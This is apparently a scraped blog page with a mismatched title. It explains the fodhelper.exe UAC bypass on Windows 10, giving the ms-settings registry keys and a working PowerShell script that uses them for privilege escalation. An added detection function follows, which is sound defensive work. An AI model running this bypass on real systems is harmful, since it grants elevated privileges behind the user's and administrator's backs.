printstotal.blogg.se

Windows Cannot Find Optionalfeatures.Exe

Windows 10 environments allow users to manage language settings for a variety of Windows features such as typing, text to speech, etc. When a user requests to open “Manage Optional Features” in Windows Settings in order to make a language change, a process is created under the name fodhelper.exe. This process runs as high integrity because the binary has the autoelevate setting set to “true”. This can be verified by checking the Event Properties of the process:

Fodhelper – Running as High Integrity Process

However, processes that run with higher privileges can give an attacker the opportunity to execute code with the same level of privileges if they can be abused in a certain way. Specifically, winscripting discovered that when the “fodhelper” process starts it tries to find some registry keys which do not exist. The following checks are performed in the registry upon start of fodhelper.exe:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
HKCU:\Software\Classes\ms-settings\shell\open\command\(default)

Since these registry entries do not exist, a user can create this structure in the registry in order to manipulate fodhelper to execute a command with higher privileges, bypassing User Account Control (UAC).

C:\Windows\System32\cmd.exe /c powershell.exe

Fodhelper – Creating the Registry Structure Manually

When “Manage Optional Features” or “fodhelper.exe” runs again, the command will be executed and an elevated PowerShell session will open:

Fodhelper – Elevated PowerShell

In order to automate this process, winscripting developed a PowerShell script that can perform the bypass in three steps:

$program = "cmd /c start powershell.exe" #default
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
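
Because the ms-settings command key described above does not exist by default, its presence in a user hive is a useful thing to look for on a host. The following is an added detection example, not part of the original post or of winscripting's script; the function name Get-MsSettingsHandlerOverride is hypothetical, and it only covers user hives that are currently loaded under HKEY_USERS.

```powershell
# Added detection example (not from the original post).
# Reports any per-user ms-settings open command, the registry structure that
# fodhelper.exe looks up at start. Only hives loaded under HKEY_USERS are
# checked; profiles of logged-off users are not covered.
$subKey = 'Software\Classes\ms-settings\shell\open\command'

function Get-MsSettingsHandlerOverride {   # hypothetical helper name
    $findings = foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        # <SID>_Classes is the same data reached through <SID>\Software\Classes.
        if ($hive.PSChildName -like '*_Classes') { continue }

        $path = "Registry::HKEY_USERS\$($hive.PSChildName)\$subKey"
        if (-not (Test-Path -LiteralPath $path)) { continue }

        $key = Get-Item -LiteralPath $path
        [pscustomobject]@{
            Sid                = $hive.PSChildName
            KeyPath            = $key.Name
            # The unnamed (default) value holds the command that would be run.
            DefaultValue       = $key.GetValue('')
            HasDelegateExecute = $key.GetValueNames() -contains 'DelegateExecute'
        }
    }
    return $findings
}

$hits = Get-MsSettingsHandlerOverride
if ($hits) {
    # Any hit deserves review: the key is absent on a default installation.
    $hits | Format-List
} else {
    'No per-user ms-settings open command found in loaded user hives.'
}
```

Run it from an elevated session so that the hives of other logged-on users can be read.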





